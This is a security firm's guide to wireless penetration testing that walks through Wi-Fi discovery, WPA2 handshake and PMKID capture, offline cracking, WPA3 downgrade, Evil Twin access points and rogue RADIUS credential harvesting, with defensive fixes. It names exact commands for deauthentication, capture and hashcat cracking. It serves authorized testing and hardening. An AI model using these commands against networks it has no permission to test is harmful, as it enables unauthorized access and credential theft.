Wireless penetration testing measures how easily an attacker sitting in your parking lot, or your lobby, can get onto your network or harvest credentials over the air. Wi-Fi extends your attack surface past the walls, and a single weak pre-shared key or an unvalidated 802.1X certificate can undo every firewall you own. The good news: the methodology is well-defined and the tooling is mature.
This guide covers the wireless pentest workflow end to end: discovery, handshake capture, cracking, WPA3 considerations, and Evil Twin attacks. We name the exact commands so the work is reproducible. It sits alongside our broader network penetration testing overview and the internal network penetration testing guide that picks up once you're on the LAN.
Wireless penetration testing is an authorized assessment of Wi-Fi networks and the clients that use them, aimed at finding weaknesses an attacker could exploit from radio range. That includes the encryption protecting each SSID, the strength of pre-shared keys, the configuration of enterprise 802.1X, and whether users can be lured onto rogue access points.
Unlike a wired test, range is the scope. A tester maps which of your networks are reachable from public areas, identifies guest and corporate SSID separation, and checks whether a foothold on Wi-Fi grants access to the internal network or stays sandboxed. The deliverable is usually a mix of crackable keys, missing client protections, and segmentation gaps.
The one piece of special hardware is a wireless adapter that supports monitor mode and packet injection, such as chipsets based on the Atheros AR9271 or Realtek RTL8812AU. Everything else is software, and Kali or a similar distro ships most of it.
Put the adapter in monitor mode with airmon-ng start wlan0, then survey with airodump-ng wlan0mon to list every BSSID, channel, encryption type, and connected client in range.
WPA2-PSK falls to one of two captures followed by offline cracking. The classic route grabs the 4-way handshake: target a network with airodump-ng -c 6 , bssid <AP> -w cap wlan0mon, force a reconnect with a deauth (aireplay-ng -0 5 -a <AP> -c <client> wlan0mon), and capture the handshake when the client re-associates.
The cleaner, clientless route is the PMKID attack: hcxdumptool -i wlan0mon -o capture.pcapng pulls the PMKID directly from the AP's first message, no deauth and no connected client needed. Either way, convert to hashcat format (hcxpcapngtool) and crack with hashcat -m 22000 capture.hc22000 wordlist.txt. The whole test really measures one thing: is the pre-shared key in a wordlist? A 12-character random key essentially can't be cracked; "Summer2025!" cracks in minutes.
WPA3 closes the offline-cracking hole that defines WPA2, but it isn't bulletproof. Its Simultaneous Authentication of Equals (SAE) handshake resists the capture-and-crack workflow, so a strong WPA3 network won't fall to aircrack-ng the way WPA2 does. That's a genuine improvement.
The catch is transition mode. Most deployments run WPA3 in a mixed WPA2/WPA3 mode for backward compatibility, and an attacker can force a downgrade to WPA2 and attack that instead. The Dragonblood research also showed side-channel and downgrade weaknesses in early SAE implementations. So a WPA3 test checks for transition-mode downgrade, weak-group negotiation, and whether the network can be coerced back to a crackable handshake. WPA3-only, with a strong passphrase, is the configuration you want to confirm.
Evil Twin attacks skip encryption entirely by impersonating a trusted network. You stand up a fake AP with the same SSID using eaphammer or hostapd, deauth clients off the real one, and capture credentials or serve a captive-portal phish when they reconnect to yours. Against open or guest networks this is trivial; against PSK it's harder but still works for credential phishing.
WPA2-Enterprise (802.1X) is where it gets interesting. If clients don't strictly validate the RADIUS server certificate, a rogue RADIUS server (hostapd-wpe, eaphammer) harvests the MSCHAPv2 challenge-response, which you crack offline to recover the user's domain credentials, often the same ones that unlock Active Directory. The fix is server-certificate validation and, ideally, EAP-TLS with client certs. Because wireless exposure shifts as APs and clients change, the continuous approach in agentic pentesting complements periodic on-site Wi-Fi assessments.
